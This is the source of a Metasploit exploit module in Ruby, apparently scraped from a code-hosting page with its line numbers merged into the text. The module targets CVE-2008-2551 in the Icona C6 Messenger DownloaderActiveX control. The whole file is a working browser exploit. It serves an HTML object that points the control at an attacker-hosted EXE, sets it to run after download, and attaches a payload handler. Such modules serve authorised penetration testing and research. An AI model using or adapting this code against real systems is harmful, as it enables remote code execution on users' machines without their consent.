Path: blob/master/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',16'Description' => %q{17This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The18vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The19insecure control can be abused to download and execute arbitrary files in the context of20the currently logged-on user.21},22'License' => MSF_LICENSE,23'Author' => [24'Unknown', # Nine:Situations:Group::SnoopyAssault, vulnerability discovery and exploit25'juan vazquez' # metasploit module26],27'References' => [28[ 'CVE', '2008-2551' ],29[ 'OSVDB', '45960' ],30[ 'BID', '29519' ]31],32'DefaultOptions' => {33'EXITFUNC' => "none",34'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'35},36'Payload' => {37'Space' => 2048,38'StackAdjustment' => -3500,39},40'Platform' => 'win',41'Targets' => [42[ 'Automatic', {} ],43],44'DisclosureDate' => '2008-06-03',45'DefaultTarget' => 0,46'Privileged' => false,47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)54end5556def autofilter57false58end5960def check_dependencies61use_zlib62end6364def on_request_uri(cli, request)65# Only IEs are potential targets66# "File Session" is used when the ActiveX tries to request the EXE67agent = request.headers['User-Agent']68if agent !~ /MSIE \d\.\d|File Session/69print_error("Target not supported: #{agent}")70return71end7273payload_url = "http://"74payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']75payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"7677if (request.uri.match(/#{@payload_rand}/))78return if ((p = regenerate_payload(cli)) == nil)7980data = generate_payload_exe({ :code => p.encoded })81print_status("Sending EXE payload")82send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })83return84end8586exe = rand_text_alpha(rand(5) + 1)8788content = %Q|89<html>90<object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">91<param name="propProgressBackground" value="#bccee8">92<param name="propTextBackground" value="#f7f8fc">93<param name="propBarColor" value="#df0203">94<param name="propTextColor" value="#000000">95<param name="propWidth" value="0">96<param name="propHeight" value="0">97<param name="propDownloadUrl" value="#{payload_url}/#{exe}.exe">98<param name="propPostDownloadAction" value="run">99<param name="propInstallCompleteUrl" value="">100<param name="propBrowserRedirectUrl" value="">101<param name="propVerbose" value="0">102<param name="propInterrupt" value="0">103</OBJECT>104</html>105|106107print_status("Sending #{self.name}")108109send_response_html(cli, content)110111handler(cli)112end113114def exploit115@payload_rand = rand_text_alpha(rand(5) + 5)116super117end118end119120121